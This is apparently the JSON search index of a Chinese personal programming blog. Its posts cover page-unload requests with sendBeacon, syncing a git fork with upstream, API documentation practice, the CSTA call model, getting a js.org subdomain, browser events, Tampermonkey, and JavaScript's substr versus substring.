navigator.sendBeacon 优点:简洁、异步、非阻塞 缺点:这是实验性的技术,并非所有浏览器都支持。其中IE和safari不支持该技术。\n示例:\nwindow.addEventListener(\u0026#39;unload\u0026#39;, logData, false); function logData() { navigator.sendBeacon(\u0026#34;/log\u0026#34;, analyticsData); } 参考:http://stackoverflow.com/questions/1821625/ajax-request-with-jquery-on-page-unload 参考:https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon\n","permalink":"https://wdd.js.org/posts/2018/02/send-ajax-when-page-unload/","summary":"0.1. 同步Ajax 这种需求主要用于当浏览器关闭,或者刷新时,向后端发起Ajax请求。\nwindow.onunload = function(){ $.ajax({url:\u0026#34;http://localhost:8888/test.php?\u0026#34;, async:false}); }; 使用async:false参数使请求同步(默认是异步的)。\n同步请求锁定浏览器,直到完成。 如果请求是异步的,页面只是继续卸载。 它足够快,以至于该请求甚至没有时间触发。服务端很可能收不到请求。\n0.2. navigator.sendBeacon 优点:简洁、异步、非阻塞 缺点:这是实验性的技术,并非所有浏览器都支持。其中IE和safari不支持该技术。\n示例:\nwindow.addEventListener(\u0026#39;unload\u0026#39;, logData, false); function logData() { navigator.sendBeacon(\u0026#34;/log\u0026#34;, analyticsData); } 参考:http://stackoverflow.com/questions/1821625/ajax-request-with-jquery-on-page-unload 参考:https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon","title":"发起Ajax请求当页面onunload"},{"content":"1. 前提说明 仓库A: http://gitlab.tt.cc:30000/fe/omp.git 仓库B: 仓库Bfork自仓库A, 仓库A的地址是:http://gitlab.tt.cc:30000/wangdd/omp.git 某一时刻,仓库A更新了。仓库B需要同步上游分支的更新。\n2. 本地操作 // 1 查看远程分支 ➜ omp git:(master) git remote -v origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (fetch) origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (push) // 2 添加一个远程同步的上游仓库 ➜ omp git:(master) git remote add upstream http://gitlab.tt.cc:30000/fe/omp.git ➜ omp git:(master) git remote -v origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (fetch) origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (push) upstream\thttp://gitlab.tt.cc:30000/fe/omp.git (fetch) upstream\thttp://gitlab.tt.cc:30000/fe/omp.git (push) // 3 拉去上游分支到本地,并且会被存储在一个新分支upstream/master ➜ omp git:(master) git fetch upstream remote: Counting objects: 4, done. 
remote: Compressing objects: 100% (4/4), done. remote: Total 4 (delta 2), reused 0 (delta 0) Unpacking objects: 100% (4/4), done. From http://gitlab.tt.cc:30000/fe/omp * [new branch] master -\u0026gt; upstream/master // 4 将upstream/master分支合并到master分支,由于我已经在master分支,此处就不在切换到master分支 ➜ omp git:(master) git merge upstream/master Updating 29c098c..6413803 Fast-forward README.md | 1 + 1 file changed, 1 insertion(+) // 5 查看一下,此次合并,本地有哪些更新 ➜ omp git:(master) git log -p // 6 然后将更新推送到仓库B ➜ omp git:(master) git push 3. 总结 通过上述操作,仓库B就同步了仓库A的代码。整体的逻辑就是将上游分支拉去到本地,然后合并到本地分支上。就这么简单。\n","permalink":"https://wdd.js.org/posts/2018/01/fork-sync-learn/","summary":"1. 前提说明 仓库A: http://gitlab.tt.cc:30000/fe/omp.git 仓库B: 仓库Bfork自仓库A, 仓库A的地址是:http://gitlab.tt.cc:30000/wangdd/omp.git 某一时刻,仓库A更新了。仓库B需要同步上游分支的更新。\n2. 本地操作 // 1 查看远程分支 ➜ omp git:(master) git remote -v origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (fetch) origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (push) // 2 添加一个远程同步的上游仓库 ➜ omp git:(master) git remote add upstream http://gitlab.tt.cc:30000/fe/omp.git ➜ omp git:(master) git remote -v origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (fetch) origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (push) upstream\thttp://gitlab.tt.cc:30000/fe/omp.git (fetch) upstream\thttp://gitlab.tt.cc:30000/fe/omp.git (push) // 3 拉去上游分支到本地,并且会被存储在一个新分支upstream/master ➜ omp git:(master) git fetch upstream remote: Counting objects: 4, done. 
remote: Compressing objects: 100% (4/4), done.","title":"git合并上游仓库即同步fork后的仓库"},{"content":" 个人简介 我是Eddie Wang!\n精通JavaScript/Node.js,现在的兴趣是学习go语言 精通VOIP相关技术栈:SIP/opensips/Freeswitch等等 精通VIM email: 1779706607@qq.com Github: github.com/wangduanduan 语雀: yuque.com/wangdd, 将不会更新 个人博客: wdd.js.org, 最新内容将会发布在wdd.js.org 最喜欢的美剧《黄石》 博客说明 博客取名为洞香春,灵感来自孙皓晖所著《大秦帝国》。\n洞香春大致在战国时代中期所在地:魏国安邑。\n战国时期,社会制度发生着巨大变化,工商业日益兴旺,出现了以白圭为首的一批巨贾商人,而位于魏国安邑的洞香春酒肆就是白氏家族创办的产业中最为著名的一个。\n洞香春以名士荟萃、谈论国事、交流思想而著称于当时列国\n","permalink":"https://wdd.js.org/about/","summary":"个人简介 我是Eddie Wang!\n精通JavaScript/Node.js,现在的兴趣是学习go语言 精通VOIP相关技术栈:SIP/opensips/Freeswitch等等 精通VIM email: 1779706607@qq.com Github: github.com/wangduanduan 语雀: yuque.com/wangdd, 将不会更新 个人博客: wdd.js.org, 最新内容将会发布在wdd.js.org 最喜欢的美剧《黄石》 博客说明 博客取名为洞香春,灵感来自孙皓晖所著《大秦帝国》。\n洞香春大致在战国时代中期所在地:魏国安邑。\n战国时期,社会制度发生着巨大变化,工商业日益兴旺,出现了以白圭为首的一批巨贾商人,而位于魏国安邑的洞香春酒肆就是白氏家族创办的产业中最为著名的一个。\n洞香春以名士荟萃、谈论国事、交流思想而著称于当时列国","title":"关于我"},{"content":" 1. HTTP携带信息的方式 url headers body: 包括请求体,响应体 2. 分离通用信息 一般来说,headers里的信息都是通用的,可以提前说明,作为默认参数\n3. 路径中的参数表达式 URL中参数表达式使用{}的形式,参数包裹在大括号之中{paramName}\n例如:\n/api/user/{userId} /api/user/{userType}?age={age}\u0026amp;gender={gender} 4. 数据模型定义 数据模型定义包括:\n路径与查询字符串参数模型 请求体参数模型 响应体参数模型 数据模型的最小数据集:\n名称 是否必须 说明 “最小数据集”(MDS)是指通过收集最少的数据,较好地掌握一个研究对象所具有的特点或一件事情、一份工作所处的状态,其核心是针对被观察的对象建立起一套精简实用的数据指标。最小数据集的概念起源于美国的医疗领域。最小数据集的产生源于信息交换的需要,就好比上下级质量技术监督部门之间、企业与质量技术监督部门之间、质量技术监督部门与社会公众之间都存在着信息交换的需求。\n一些文档里可能会加入字段的类型,但是我认为这是没必要的。以为HTTP传输的数据往往都需要序列化,大部分数据类型都是字符串。一些特殊的类型,例如枚举类型的字符串,可以在说明里描述。\n另外:数据模型非常建议使用表格来表现。\n举个栗子🌰:\n名称 是否必须 说明 userType 是 用户类型。commom表示普通用户,vip表示vip用户 age 否 用户年龄 gender 否 用户性别。1表示男,0表示女 5. 
请求示例 // general POST http://www.testapi.com/api/user // request payload { \u0026#34;name\u0026#34;: \u0026#34;qianxun\u0026#34;, \u0026#34;age\u0026#34;: 14, \u0026#34;like\u0026#34;: [\u0026#34;music\u0026#34;, \u0026#34;reading\u0026#34;], \u0026#34;userType\u0026#34;: \u0026#34;vip\u0026#34; } // response { \u0026#34;id\u0026#34;: \u0026#34;asdkfjalsdkf\u0026#34; } 6. 异常处理 异常处理最小数据集\n状态码 说明 解决方案 举个栗子🌰:\n状态码 说明 解决方案 401 用户名密码错误 检查用户名密码是否正确 424 超过最大在线数量 请在控制台修改最大在线数量 之前我一直不想把解决方案加入异常处理的最小数据集,但是对于很多开发者来说,即使它知道424代表超过最大在线数量。如果你不告诉如果解决这个问题,那么他们可能就会直接来问你。所以最好能够一步到位,直接告诉他应该如何解决,这样省时省力。\n7. 如何组织? 7.1. 一个创建用户的例子:创建用户 1 请求示例\n// general POST http://www.testapi.com/api/user/vip/?token=abcdefg // request payload { \u0026#34;name\u0026#34;: \u0026#34;qianxun\u0026#34;, \u0026#34;age\u0026#34;: 14, \u0026#34;like\u0026#34;: [\u0026#34;music\u0026#34;, \u0026#34;reading\u0026#34;] } // response { \u0026#34;id\u0026#34;: \u0026#34;asdkfjalsdkf\u0026#34; } 2 路径与查询字符串参数模型\nPOST http://www.testapi.com/api/user/{userType}/?token={token}\n名称 是否必须 说明 userType 是 用户类型。commom表示普通用户,vip表示vip用户 token 是 认证令牌 3 请求体参数模型\n名称 是否必须 说明 name 是 用户名。4-50个字符 age 否 年龄 like 否 爱好。最多20个 4 响应体参数模型\n名称 说明 id 用户id 5 异常处理\n状态码 说明 解决方案 401 token过期 请重新申请token 424 超过最大在创建人数 请在控制台修改最大创建人数 7.2. 这样组织的原因 请求示例: 请求示例放在第一位的原因是,要用最快的方式告诉开发者,这个接口应该如何请求 路径与查询字符串参数模型: 使用mustache包裹参数 请求体参数模型:如果没有请求体,可以不写 响应体参数模型: 异常处理 8. 
文档提供的形式 文档建议由一下两种形式,在线文档,pdf文档。\n在线文档 更新方便 易于随时阅读 易于查找 pdf文档 内容表现始终如一,不依赖文档阅读器 文档只读,不会被轻易修改 其中由于是面对第三方开发者,公开的在线文档必须提供;由于某些特殊的原因,可能需要提供文件形式的文档,建议提供pdf文档。当然,以下的文档形式是非常不建议提供的:\nword文档 markdown文档 word文档和markdown文档有以下缺点:\n文档的表现形式非常依赖文档查看器:各个版本的word文档对word的表现形式差异很大,可能在你的电脑上内容表现很好的文档,到别人的电脑上就会一团乱麻;另外markdown文件也是如此。而且markdown中引入文件只能依靠图片链接,如果文档中含有图片,很可能会出现图片丢失的情况。 文档无法只读:文档无法只读,就有可能会被第三方开发者在不经意间修改,那么文档就无法保证其准确性了。 总结一下,文档形式的要点:\n只读性:保证文档不会被开发者轻易修改 一致性:保证文档在不同设备,不同文档查看器上内容表现始终如一 易于版本管理:文档即软件(DAAS: Document as a Software),一般意义上说软件 = 数据 + 算法, 但是我认为文档也是一种组成软件的重要形式。既然软件需要版本管理,文档的版本管理也是比不可少的。 ","permalink":"https://wdd.js.org/posts/2018/01/how-to-write-better-api-docs/","summary":"1. HTTP携带信息的方式 url headers body: 包括请求体,响应体 2. 分离通用信息 一般来说,headers里的信息都是通用的,可以提前说明,作为默认参数\n3. 路径中的参数表达式 URL中参数表达式使用{}的形式,参数包裹在大括号之中{paramName}\n例如:\n/api/user/{userId} /api/user/{userType}?age={age}\u0026amp;gender={gender} 4. 数据模型定义 数据模型定义包括:\n路径与查询字符串参数模型 请求体参数模型 响应体参数模型 数据模型的最小数据集:\n名称 是否必须 说明 “最小数据集”(MDS)是指通过收集最少的数据,较好地掌握一个研究对象所具有的特点或一件事情、一份工作所处的状态,其核心是针对被观察的对象建立起一套精简实用的数据指标。最小数据集的概念起源于美国的医疗领域。最小数据集的产生源于信息交换的需要,就好比上下级质量技术监督部门之间、企业与质量技术监督部门之间、质量技术监督部门与社会公众之间都存在着信息交换的需求。\n一些文档里可能会加入字段的类型,但是我认为这是没必要的。以为HTTP传输的数据往往都需要序列化,大部分数据类型都是字符串。一些特殊的类型,例如枚举类型的字符串,可以在说明里描述。\n另外:数据模型非常建议使用表格来表现。\n举个栗子🌰:\n名称 是否必须 说明 userType 是 用户类型。commom表示普通用户,vip表示vip用户 age 否 用户年龄 gender 否 用户性别。1表示男,0表示女 5. 请求示例 // general POST http://www.testapi.com/api/user // request payload { \u0026#34;name\u0026#34;: \u0026#34;qianxun\u0026#34;, \u0026#34;age\u0026#34;: 14, \u0026#34;like\u0026#34;: [\u0026#34;music\u0026#34;, \u0026#34;reading\u0026#34;], \u0026#34;userType\u0026#34;: \u0026#34;vip\u0026#34; } // response { \u0026#34;id\u0026#34;: \u0026#34;asdkfjalsdkf\u0026#34; } 6. 
异常处理 异常处理最小数据集","title":"如何写好接口文档?"},{"content":"解决方法安装Windows7补丁:KB3008923; 下载地址: http://www.microsoft.com/en-us/download/details.aspx?id=45134 (32位) http://www.microsoft.com/zh-CN/download/details.aspx?id=45154 (64位)\n","permalink":"https://wdd.js.org/posts/2018/01/ie11-without-devtool/","summary":"解决方法安装Windows7补丁:KB3008923; 下载地址: http://www.microsoft.com/en-us/download/details.aspx?id=45134 (32位) http://www.microsoft.com/zh-CN/download/details.aspx?id=45154 (64位)","title":"win7 ie11 开发者工具打开后一片空白"},{"content":"1. 内容概要 CSTA协议与标准概述 CSTA OpenScape 语音架构概述 2. CSTA协议标准 2.1. 什么是CSTA ? CSTA:电脑支持通讯程序(Computer Supported TelecommunicationsApplications)\n基本的呼叫模型在1992建立,后来随着行业发展,呼叫模型也被加强和扩展,例如新的协议等等\nCSTA是一个应用层接口,用来监控呼叫,设备和网络\nCSTA创建了一个通讯程序的抽象层:\nCSTA并不依赖任何底层的信令协议 E.g.H.323,SIP,Analog,T1,ISDN,etc. CSTA并不要求用户必须使用某些设备 E.g.intelligentendpoints,low-function/stimulusdevices,SIPSignalingmodels-3PCC vs. Peer/Peer 适用不同的操作模式\n第三方呼叫控制 一方呼叫控制 CSTA的设计目标是为了提高各种CSTA实现之间的移植性\n规范化呼叫模型和行为 完成服务、事件定义 规范化标准 3. CSTA 标准的进化史 阶段1 (发布于 June ’92)\n40 特性, 66 页 (服务定义) 专注于呼叫控制 阶段2 (发布于 Dec. ’94)\n77 特性, 145 页 (服务定义) I/O \u0026amp; 语音单元服务, 更多呼叫控制服务 阶段3 - CSTA Phase II Features \u0026amp; versit CTI Technology\n发布于 Dec. ‘98 136 特性, 650 页 (服务定义) 作为ISO 标准发布于 July 2000 发布 CSTA XML (ECMA-323) June 2004 发布 “Using CSTA with Voice Browsers” (TR/85) Dec. 02 发布 CSTA WSDL (ECMA-348) June 2004 June 2004: 发布对象模型 TR/88\nJune 2004: 发布 “Using CSTA for SIP Phone User Agents (uaCSTA)” TR/87\nJune 2004: 发布 “Application Session Services” (ECMA-354)\nJune 2005: 发布 “WS-Session: WSDL for ECMA-354”(ECMA-366)\nDecember 2005 : 发布 “Management Notification and Computing Function Services”\nDecember 2005 : Session Management, Event Notification, Amendements for ECMA- 348” (TR/90)\nDecember 2006 : Published new editions of ECMA-269, ECMA-323, ECMA-348\n4. CSTA 标准文档 5. CSTA 标准扩展 新的特性可以被加入标准通过发布新版本的标准 新的参数,新的值可以被加入通过发布新版本的标准 未来的新版本必须下向后兼容 具体的实施可以增加属性通过CSTA自带的扩展机制(e.g. ONS – One Number Service) 6. 
CSTA 操作模型 CSTA操作模型由计算域和转换域组成,是CSTA定义在两个域之间的接口 CSTA标准规定了消息(服务以及事件上报),还有与之相关的行为 计算域是CSTA程序的宿主环境,用来与转换域交互与控制 转换域 - CSTA模型提供抽象层,程序可以观测并控制的。转换渔包括一些对象例如CSTA呼叫,设备,链接。 7. CSTA 操作模型:呼叫,设备,链接 相关说明是的的的的\n8. 参考 CSTAoverview CSTA_introduction_and_overview ","permalink":"https://wdd.js.org/posts/2018/01/csta-call-model-overview/","summary":"1. 内容概要 CSTA协议与标准概述 CSTA OpenScape 语音架构概述 2. CSTA协议标准 2.1. 什么是CSTA ? CSTA:电脑支持通讯程序(Computer Supported TelecommunicationsApplications)\n基本的呼叫模型在1992建立,后来随着行业发展,呼叫模型也被加强和扩展,例如新的协议等等\nCSTA是一个应用层接口,用来监控呼叫,设备和网络\nCSTA创建了一个通讯程序的抽象层:\nCSTA并不依赖任何底层的信令协议 E.g.H.323,SIP,Analog,T1,ISDN,etc. CSTA并不要求用户必须使用某些设备 E.g.intelligentendpoints,low-function/stimulusdevices,SIPSignalingmodels-3PCC vs. Peer/Peer 适用不同的操作模式\n第三方呼叫控制 一方呼叫控制 CSTA的设计目标是为了提高各种CSTA实现之间的移植性\n规范化呼叫模型和行为 完成服务、事件定义 规范化标准 3. CSTA 标准的进化史 阶段1 (发布于 June ’92)\n40 特性, 66 页 (服务定义) 专注于呼叫控制 阶段2 (发布于 Dec. ’94)\n77 特性, 145 页 (服务定义) I/O \u0026amp; 语音单元服务, 更多呼叫控制服务 阶段3 - CSTA Phase II Features \u0026amp; versit CTI Technology\n发布于 Dec. ‘98 136 特性, 650 页 (服务定义) 作为ISO 标准发布于 July 2000 发布 CSTA XML (ECMA-323) June 2004 发布 “Using CSTA with Voice Browsers” (TR/85) Dec.","title":"CSTA 呼叫模型简介"},{"content":" 之前我是使用wangduanduan.github.io作为我的博客地址,后来觉得麻烦,有把博客关了。最近有想去折腾折腾。 先看效果:wdd.js.org\n如果你不了解js.org可以看看我的这篇文章:一个值得所有前端开发者关注的网站js.org\n1. 前提 已经有了github pages的一个博客,并且博客中有内容,没有内容会审核不通过的。我第一次申请域名,就是因为内容太少而审核不通过。 2. 想好自己要什么域名? 比如你想要一个:wdd.js.org的域名,你先在浏览器里访问这个地址,看看有没有人用过,如果已经有人用过,那么你就只能想点其他的域名了。\n3. fork js.org的项目,添加自己的域名 1 fork https://github.com/js-org/dns.js.org 2 修改你fork后的仓库中的cnames_active.js文件,加上自己的一条域名,最好要按照字母顺序\n如下图所示,我在第1100行加入。注意,不要在该行后加任何注释。\n\u0026#34;wdd\u0026#34;: \u0026#34;wangduanduan.github.io\u0026#34;, 3 commit\n4. 加入CNAME文件 我是用hexo和next主题作为博客的模板。其中我在gh-pages分支写博客,然后部署到master分支。\n我在我的gh-pages分支的source目录下加入CNAME文件, 内容只有一行\nwdd.js.org 将博客再次部署好,如果CNAME生效的话,你已经无法从原来的地址访问:wangduanduan.github.io, 这个博客了。\n5. 
向js.org项目发起pull-request 找到你fork后的项目,点击 new pull request, 向原来的项目发起请求。\n然后你可以在js-org/dns.js.org项目的pull requests看到你的请求,当这个请求被合并时,你就拥有了js.org的二级域名。\n","permalink":"https://wdd.js.org/posts/2018/01/how-to-get-jsorg-sub-domain/","summary":"之前我是使用wangduanduan.github.io作为我的博客地址,后来觉得麻烦,有把博客关了。最近有想去折腾折腾。 先看效果:wdd.js.org\n如果你不了解js.org可以看看我的这篇文章:一个值得所有前端开发者关注的网站js.org\n1. 前提 已经有了github pages的一个博客,并且博客中有内容,没有内容会审核不通过的。我第一次申请域名,就是因为内容太少而审核不通过。 2. 想好自己要什么域名? 比如你想要一个:wdd.js.org的域名,你先在浏览器里访问这个地址,看看有没有人用过,如果已经有人用过,那么你就只能想点其他的域名了。\n3. fork js.org的项目,添加自己的域名 1 fork https://github.com/js-org/dns.js.org 2 修改你fork后的仓库中的cnames_active.js文件,加上自己的一条域名,最好要按照字母顺序\n如下图所示,我在第1100行加入。注意,不要在该行后加任何注释。\n\u0026#34;wdd\u0026#34;: \u0026#34;wangduanduan.github.io\u0026#34;, 3 commit\n4. 加入CNAME文件 我是用hexo和next主题作为博客的模板。其中我在gh-pages分支写博客,然后部署到master分支。\n我在我的gh-pages分支的source目录下加入CNAME文件, 内容只有一行\nwdd.js.org 将博客再次部署好,如果CNAME生效的话,你已经无法从原来的地址访问:wangduanduan.github.io, 这个博客了。\n5. 向js.org项目发起pull-request 找到你fork后的项目,点击 new pull request, 向原来的项目发起请求。\n然后你可以在js-org/dns.js.org项目的pull requests看到你的请求,当这个请求被合并时,你就拥有了js.org的二级域名。","title":"组织在召唤:如何免费获取一个js.org的二级域名"},{"content":"1. visibilitychange事件 触发条件:浏览器标签页被隐藏或显示的时候会触发visibilitychange事件.\n使用场景:当标签页显示或者隐藏时,触发一些业务逻辑\ndocument.addEventListener(\u0026#34;visibilitychange\u0026#34;, function() { console.log( document.visibilityState ); }); 2. storage事件 触发条件:使用localStorage or sessionStorage存储或者修改某个本地存储时\n使用场景:标签页间通信\n// AB页面同源 // 在A 页面 window.addEventListener(\u0026#39;storage\u0026#39;, (e) =\u0026gt; {console.log(e)}) // 在B 页面,向120打个电话 localStorage.setItem(\u0026#39;makeCall\u0026#39;,\u0026#39;120\u0026#39;) // 然后可以在A页面间有输出, 可以看出A页面 收到了B页面的通知 ...key: \u0026#34;makeCall\u0026#34;, oldValue: \u0026#34;119\u0026#34;, newValue: \u0026#34;120\u0026#34;, ... 3. beforeunload事件 触发条件:当页面的资源将要卸载(及刷新或者关闭标签页前). 
当页面依然可见,并且该事件可以被取消只时\n使用场景:关闭或者刷新页面时弹窗确认,关闭页面时向后端发送报告等\nwindow.addEventListener(\u0026#34;beforeunload\u0026#34;, function (e) { var confirmationMessage = \u0026#34;\\o/\u0026#34;; e.returnValue = confirmationMessage; // Gecko, Trident, Chrome 34+ return confirmationMessage; // Gecko, WebKit, Chrome \u0026lt;34 }); 4. navigator.sendBeacon 这个方法主要用于满足 统计和诊断代码 的需要,这些代码通常尝试在卸载(unload)文档之前向web服务器发送数据。过早的发送数据可能导致错过收集数据的机会。然而, 对于开发者来说保证在文档卸载期间发送数据一直是一个困难。因为用户代理通常会忽略在卸载事件处理器中产生的异步 XMLHttpRequest 。\n使用 sendBeacon() 方法,将会使用户代理在有机会时异步地向服务器发送数据,同时不会延迟页面的卸载或影响下一导航的载入性能。这就解决了提交分析数据时的所有的问题:使它可靠,异步并且不会影响下一页面的加载。此外,代码实际上还要比其他技术简单!\n注意:该方法在IE和safari没有实现\n使用场景:发送崩溃报告\nwindow.addEventListener(\u0026#39;unload\u0026#39;, logData, false); function logData() { navigator.sendBeacon(\u0026#34;/log\u0026#34;, analyticsData); } ","permalink":"https://wdd.js.org/posts/2018/01/browser-events/","summary":"1. visibilitychange事件 触发条件:浏览器标签页被隐藏或显示的时候会触发visibilitychange事件.\n使用场景:当标签页显示或者隐藏时,触发一些业务逻辑\ndocument.addEventListener(\u0026#34;visibilitychange\u0026#34;, function() { console.log( document.visibilityState ); }); 2. storage事件 触发条件:使用localStorage or sessionStorage存储或者修改某个本地存储时\n使用场景:标签页间通信\n// AB页面同源 // 在A 页面 window.addEventListener(\u0026#39;storage\u0026#39;, (e) =\u0026gt; {console.log(e)}) // 在B 页面,向120打个电话 localStorage.setItem(\u0026#39;makeCall\u0026#39;,\u0026#39;120\u0026#39;) // 然后可以在A页面间有输出, 可以看出A页面 收到了B页面的通知 ...key: \u0026#34;makeCall\u0026#34;, oldValue: \u0026#34;119\u0026#34;, newValue: \u0026#34;120\u0026#34;, ... 3. beforeunload事件 触发条件:当页面的资源将要卸载(及刷新或者关闭标签页前). 
当页面依然可见,并且该事件可以被取消只时\n使用场景:关闭或者刷新页面时弹窗确认,关闭页面时向后端发送报告等\nwindow.addEventListener(\u0026#34;beforeunload\u0026#34;, function (e) { var confirmationMessage = \u0026#34;\\o/\u0026#34;; e.returnValue = confirmationMessage; // Gecko, Trident, Chrome 34+ return confirmationMessage; // Gecko, WebKit, Chrome \u0026lt;34 }); 4.","title":"不常用却很有妙用的事件及方法"},{"content":" 当你用浏览器访问某个网页时,你可曾想过,你看到的这个网页,实际上是属于你自己的。\n打个比喻:访问某个网站就好像是网购了一筐鸡蛋,鸡蛋虽然是养鸡场生产的,但是这个蛋我怎么吃,你养鸡场管不着。\n当然了,对于很多人来说,鸡蛋没有别的吃法,鸡蛋只能煮着吃。\n你可以看如下的页面:当你在某搜索引擎上搜索前端开发时\n大多数人看到的页面是这样的, 满屏的广告,满屏的推广,满屏的排名,满屏的中间地址跳转,满屏的流量劫持, 还有莆田系\n但是有些人的页面却是这样的:清晰,自然,链接直达,清水出芙蓉,天然去雕饰 这就是油猴子脚本干的事情, 当然,它能干的事情,远不止如此。它是齐天大圣孙悟空,有七十二变。\n1. 什么是油猴子脚本? Greasemonkey,简称GM,中文俗称为“油猴”,是Firefox的一个附加组件。它让用户安装一些脚本使大部分HTML为主的网页于用户端直接改变得更方便易用。随着Greasemonkey脚本常驻于浏览器,每次随着目的网页打开而自动做修改,使得运行脚本的用户印象深刻地享受其固定便利性。\nGreasemonkey可替网页加入些新功能(例如在亚马逊书店嵌入商品比价功能)、修正网页错误、组合来自不同网页的数据、或者数繁不及备载的其他功能。写的好的Greasemonkey脚本甚至可让其输出与被修改的页面集成得天衣无缝,像是原本网页里的一部分。 来自维基百科\n2. 如何安装油猴子插件? 在google商店搜索Tampermonkey, 安装量最高的就是它。\n3. 如何写油猴子脚本? 油猴子脚本有个新建脚本页面,在此页面可以创建脚本。具体教程可以参考。\n中文 GreaseMonkey 用户脚本开发手册 GreaseMonkey(油猴子)脚本开发 深入浅出 Greasemonkey Greasemonkey Hacks/Getting Started 4. 如何使用他人的脚本? greasyfork网站提供很多脚本,它仿佛是代码界的github, 可以在该网站搜到很多有意思的脚本。\n5. 有哪些好用的脚本? 有哪些超神的油猴脚本?\n或者你可以在greasyfork网站查看一些下载量排行\n","permalink":"https://wdd.js.org/posts/2018/01/tampermonkey/","summary":"当你用浏览器访问某个网页时,你可曾想过,你看到的这个网页,实际上是属于你自己的。\n打个比喻:访问某个网站就好像是网购了一筐鸡蛋,鸡蛋虽然是养鸡场生产的,但是这个蛋我怎么吃,你养鸡场管不着。\n当然了,对于很多人来说,鸡蛋没有别的吃法,鸡蛋只能煮着吃。\n你可以看如下的页面:当你在某搜索引擎上搜索前端开发时\n大多数人看到的页面是这样的, 满屏的广告,满屏的推广,满屏的排名,满屏的中间地址跳转,满屏的流量劫持, 还有莆田系\n但是有些人的页面却是这样的:清晰,自然,链接直达,清水出芙蓉,天然去雕饰 这就是油猴子脚本干的事情, 当然,它能干的事情,远不止如此。它是齐天大圣孙悟空,有七十二变。\n1. 什么是油猴子脚本? Greasemonkey,简称GM,中文俗称为“油猴”,是Firefox的一个附加组件。它让用户安装一些脚本使大部分HTML为主的网页于用户端直接改变得更方便易用。随着Greasemonkey脚本常驻于浏览器,每次随着目的网页打开而自动做修改,使得运行脚本的用户印象深刻地享受其固定便利性。\nGreasemonkey可替网页加入些新功能(例如在亚马逊书店嵌入商品比价功能)、修正网页错误、组合来自不同网页的数据、或者数繁不及备载的其他功能。写的好的Greasemonkey脚本甚至可让其输出与被修改的页面集成得天衣无缝,像是原本网页里的一部分。 来自维基百科\n2. 如何安装油猴子插件? 
在google商店搜索Tampermonkey, 安装量最高的就是它。\n3. 如何写油猴子脚本? 油猴子脚本有个新建脚本页面,在此页面可以创建脚本。具体教程可以参考。\n中文 GreaseMonkey 用户脚本开发手册 GreaseMonkey(油猴子)脚本开发 深入浅出 Greasemonkey Greasemonkey Hacks/Getting Started 4. 如何使用他人的脚本? greasyfork网站提供很多脚本,它仿佛是代码界的github, 可以在该网站搜到很多有意思的脚本。\n5. 有哪些好用的脚本? 有哪些超神的油猴脚本?\n或者你可以在greasyfork网站查看一些下载量排行","title":"油猴子脚本 - 我的地盘我做主"},{"content":" 引子: 很多时候,当我要字符串截取时,我会想到substr和substring的方法,但是具体要怎么传参数时,我总是记不住。哪个应该传个字符串长度,哪个又应该传个开始和结尾的下标,如果我不去查查这两个函数,我始终不敢去使用它们。所以我总是觉得,这个两个方法名起的真是蹩脚。然而事实是这样的吗?\n看来是时候扒一扒这两个方法的历史了。\n1. 基因追本溯源 在编程语言的历史长河中,曾经出现过很多编程语言。然而大浪淘沙,铅华洗尽之后,很多早已折戟沉沙,有些却依旧光彩夺目。那么stubstr与substring的DNA究竟来自何处?\n1950与1960年代\n1954 - FORTRAN 1958 - LISP 1959 - COBOL 1964 - BASIC 1970 - Pascal 1967-1978:确立了基础范式\n1972 - C语言 1975 - Scheme 1978 - SQL (起先只是一种查询语言,扩充之后也具备了程序结构) 1980年代:增强、模块、性能\n1983 - C++ (就像有类别的C) 1988 - Tcl 1990年代:互联网时代\n1991 - Python 1991 - Visual Basic 1993 - Ruby 1995 - Java 1995 - Delphi (Object Pascal) 1995 - JavaScript 1995 - PHP 2009 - Go 2014 - Swift (编程语言) 1.1. 在C++中首次出现substr() 在c语言中,并没有出现substr或者substring方法。然而在1983,substr()方法已经出现在C++语言中了。然而这时候还没有出现substring, 所以可以见得:substr是stustring的老大哥\nstring substr (size_t pos = 0, size_t len = npos) const; 从C++的方法定义中可以看到, substr的参数是开始下标,以及字符串长度。\nstd::string str=\u0026#34;We think in generalities, but we live in details.\u0026#34;; std::string str2 = str.substr (3,5); // \u0026#34;think\u0026#34; 1.2. 在Java中首次出现substring() 距离substr()方法出现已经有了将近十年之隔,此间涌现一批后起之秀,如: Python, Ruby, VB之类,然而他们之中并没有stustring的基因,在Java的String类中,我们看到两个方法。从这两个方法之中我们可以看到:substring方法基本原型的参数是开始和结束的下标。\nString substring(int beginIndex) // 返回一个新的字符串,它是此字符串的一个子字符串。 String substring(int beginIndex, int endIndex) // 返回一个新字符串,它是此字符串的一个子字符串。 2. 
JavaScript的历史继承 1995年,网景公司招募了Brendan Eich,目的是将Scheme编程语言嵌入到Netscape Navigator中。在开始之前,Netscape Communications与Sun Microsystems公司合作,在Netscape Navigator中引入了更多的静态编程语言Java,以便与微软竞争用户采用Web技术和平台。网景公司决定,他们想创建的脚本语言将补充Java,并且应该有一个类似的语法,排除采用Perl,Python,TCL或Scheme等其他语言。为了捍卫对竞争性提案的JavaScript的想法,公司需要一个原型。 1995年5月,Eich在10天内写完。\n上帝用七天时间创造万物, Brendan Eich用10天时间创造了一门语言。或许用创造并不合适,因为JavaScript是站在了Perl,Python,TCL或Scheme等其他巨人的肩膀上而产生的。\nJavaScript并不像C那样出身名门,在贝尔实验室精心打造,但是JavaScript在往后的自然选择中,并没有因此萧条,反而借助于C,C++, Java, Perl,Python,TCL, Scheme优秀基因,进化出更加强大强大的生命力。\n因此可以想象,在10天之内,当Brendan Eich写到String的substr和substring方法时,或许他并没困惑着两个方法的参数应该如何设置,因为在C++和Java的实现中,已经有了类似的定义。 如果你了解历史,你就不会困惑现在。\n3. 所以,substr和substring究竟有什么不同? 如下图所示:substr和substring都接受两个参数,他们的第一个参数的含义是相同的,不同的是第二个参数。substr的第二个参数是到达结束点的距离,substring是结束的位置。\n4. 参考文献 维基百科:程式語言歷史 C++ std::string::substr 